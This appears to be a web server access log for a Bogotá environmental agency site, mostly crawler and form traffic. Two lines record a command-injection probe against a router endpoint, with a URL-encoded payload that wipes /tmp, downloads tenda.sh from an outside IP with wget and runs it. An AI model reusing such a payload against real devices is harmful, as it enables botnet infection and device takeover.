201.245.192.253 - - [17/Jan/2024:01:12:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:11:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [17/Jan/2024:01:13:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Jan/2024:01:12:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
201.245.192.253 - - [17/Jan/2024:01:13:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [17/Jan/2024:01:14:01 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-81.pdf HTTP/1.1" 200 701332
201.245.192.253 - - [17/Jan/2024:01:14:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38365
201.245.192.253 - - [17/Jan/2024:01:14:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38961
201.245.192.253 - - [17/Jan/2024:01:14:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [17/Jan/2024:01:15:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0794.pdf HTTP/1.1" 200 452114
201.245.192.253 - - [17/Jan/2024:01:15:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:01:15:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:16:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:17:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:01:18:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:18:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:18:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38365
172.22.2.4 - - [17/Jan/2024:01:17:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:19:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38961
172.22.2.4 - - [17/Jan/2024:01:18:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [17/Jan/2024:01:19:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:20:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:20:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
66.249.66.19 - - [17/Jan/2024:01:20:50 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-131.pdf HTTP/1.1" 200 1348523
66.249.66.20 - - [17/Jan/2024:01:21:45 -0500] "GET /Publicaciones/2023EE289345.pdf HTTP/1.1" 404 228
201.245.192.253 - - [17/Jan/2024:01:21:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:22:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:01:23:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:23:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:24:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38365
201.245.192.253 - - [17/Jan/2024:01:24:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38961
201.245.192.253 - - [17/Jan/2024:01:24:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:23:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Jan/2024:01:23:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [17/Jan/2024:01:25:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:01:25:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:26:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:26:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 304 -
152.61.128.50 - - [17/Jan/2024:01:27:47 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [17/Jan/2024:01:27:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.71 - - [17/Jan/2024:01:27:54 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
45.79.172.21 - - [17/Jan/2024:01:28:04 -0500] "\x16\x03\x01" 400 226
216.245.221.92 - - [17/Jan/2024:01:28:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:28:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:28:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38365
66.249.66.19 - - [17/Jan/2024:01:28:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5185.pdf HTTP/1.1" 200 849599
201.245.192.253 - - [17/Jan/2024:01:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38961
201.245.192.253 - - [17/Jan/2024:01:29:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:28:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:30:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:30:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
172.22.2.4 - - [17/Jan/2024:01:29:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [17/Jan/2024:01:31:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.20 - - [17/Jan/2024:01:31:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2741.pdf HTTP/1.1" 200 308100
201.245.192.253 - - [17/Jan/2024:01:32:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:01:33:16 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.61 - - [17/Jan/2024:01:33:51 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS+2021%2F HTTP/1.1" 200 23530
201.245.192.253 - - [17/Jan/2024:01:33:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:34:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [17/Jan/2024:01:34:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [17/Jan/2024:01:34:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:35:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:01:35:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:34:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:36:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:35:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
201.245.192.253 - - [17/Jan/2024:01:37:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:01:38:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:38:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:38:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38365
152.61.192.232 - - [17/Jan/2024:01:38:49 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [17/Jan/2024:01:39:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38961
66.249.66.20 - - [17/Jan/2024:01:39:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4643.pdf HTTP/1.1" 200 548311
201.245.192.253 - - [17/Jan/2024:01:39:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.19 - - [17/Jan/2024:01:40:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6539.pdf HTTP/1.1" 200 436611
201.245.192.253 - - [17/Jan/2024:01:40:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:40:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
179.19.102.17 - - [17/Jan/2024:01:40:53 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
205.210.31.2 - - [17/Jan/2024:01:41:45 -0500] "\x16\x03\x01" 400 226
205.210.31.2 - - [17/Jan/2024:01:41:45 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [17/Jan/2024:01:41:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
179.19.102.17 - - [17/Jan/2024:01:41:56 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
179.19.102.17 - - [17/Jan/2024:01:42:04 -0500] "POST /appsia/controlador HTTP/1.1" 200 69666
172.22.2.4 - - [17/Jan/2024:01:40:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.176 - - [17/Jan/2024:01:42:30 -0500] "GET /BLA/resoluciones/AUTOS%202022/8590.pdf HTTP/1.1" 200 1328407
201.245.192.253 - - [17/Jan/2024:01:42:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:41:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
216.245.221.92 - - [17/Jan/2024:01:43:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:43:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.165 - - [17/Jan/2024:01:44:34 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-miambiente-ni%C3%B1os.png HTTP/1.1" 304 -
201.245.192.253 - - [17/Jan/2024:01:44:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [17/Jan/2024:01:45:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1824.pdf HTTP/1.1" 200 207865
201.245.192.253 - - [17/Jan/2024:01:45:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:01:45:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:01:46:24 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [17/Jan/2024:01:46:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [17/Jan/2024:01:47:11 -0500] "GET /BLA/resoluciones/AUTOS%202013/2134.pdf HTTP/1.1" 200 260732
66.249.66.19 - - [17/Jan/2024:01:47:49 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000006%20DEL%2005%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 304 -
201.245.192.253 - - [17/Jan/2024:01:47:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:46:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [17/Jan/2024:01:48:06 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-90.pdf HTTP/1.1" 200 251796
216.245.221.92 - - [17/Jan/2024:01:48:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:48:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:47:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
201.245.192.253 - - [17/Jan/2024:01:49:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:50:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:50:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:01:51:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:52:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:01:53:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Jan/2024:01:52:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:53:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:54:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:53:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
201.245.192.253 - - [17/Jan/2024:01:55:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:01:55:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.19 - - [17/Jan/2024:01:56:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3867.pdf HTTP/1.1" 200 1233173
201.245.192.253 - - [17/Jan/2024:01:56:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:01:57:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:01:58:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:01:58:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:58:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.21 - - [17/Jan/2024:01:59:47 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-62.pdf HTTP/1.1" 200 520421
201.245.192.253 - - [17/Jan/2024:01:59:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:01:58:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
201.245.192.253 - - [17/Jan/2024:02:00:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:02:00:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:01:08 -0500] "GET /BLA/resoluciones/AUTOS%202022/3158.pdf HTTP/1.1" 200 340829
216.244.66.195 - - [17/Jan/2024:02:01:27 -0500] "GET /BLA/resoluciones/AUTOS%202022/3252.pdf HTTP/1.1" 200 343873
216.244.66.195 - - [17/Jan/2024:02:01:42 -0500] "GET /BLA/resoluciones/AUTOS%202022/3362.pdf HTTP/1.1" 200 308924
201.245.192.253 - - [17/Jan/2024:02:01:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:01:56 -0500] "GET /BLA/resoluciones/AUTOS%202022/3443.pdf HTTP/1.1" 200 430947
216.244.66.195 - - [17/Jan/2024:02:02:16 -0500] "GET /BLA/resoluciones/AUTOS%202022/4903.pdf HTTP/1.1" 200 394701
201.245.192.253 - - [17/Jan/2024:02:02:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:02:46 -0500] "GET /BLA/resoluciones/AUTOS%202022/5102.pdf HTTP/1.1" 200 402915
216.245.221.92 - - [17/Jan/2024:02:03:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:03:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.78 - - [17/Jan/2024:02:03:53 -0500] "GET /BLA/resoluciones/AUTOS%202020/4992.pdf HTTP/1.1" 200 403766
201.245.192.253 - - [17/Jan/2024:02:04:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:05:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201997/RESOLUCION%201587%20DE%201997.pdf HTTP/1.1" 200 68019
172.22.2.4 - - [17/Jan/2024:02:03:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:05:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:02:05:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:04:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [17/Jan/2024:02:06:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [17/Jan/2024:02:06:36 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-40.pdf HTTP/1.1" 200 486554
201.245.192.253 - - [17/Jan/2024:02:07:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
185.224.128.191 - - [17/Jan/2024:02:08:12 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh) HTTP/1.1" 404 1018
185.224.128.191 - - [17/Jan/2024:02:08:12 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh) HTTP/1.1" 404 1018
216.245.221.92 - - [17/Jan/2024:02:08:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:08:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.79 - - [17/Jan/2024:02:09:23 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/monitoreo-animales-fauna-11-julio-1024x768.jpg HTTP/1.1" 200 149612
201.245.192.253 - - [17/Jan/2024:02:09:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:10:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:02:10:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:10:40 -0500] "GET /BLA/resoluciones/AUTOS%202007/0151.pdf HTTP/1.1" 200 244517
66.249.66.38 - - [17/Jan/2024:02:10:47 -0500] "GET /avances-en-la-gestion-de-sitios-contaminados-en-bogota.html HTTP/1.1" 200 833
216.244.66.195 - - [17/Jan/2024:02:11:02 -0500] "GET /BLA/resoluciones/AUTOS%202007/0209.pdf HTTP/1.1" 200 15229
172.22.2.4 - - [17/Jan/2024:02:09:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
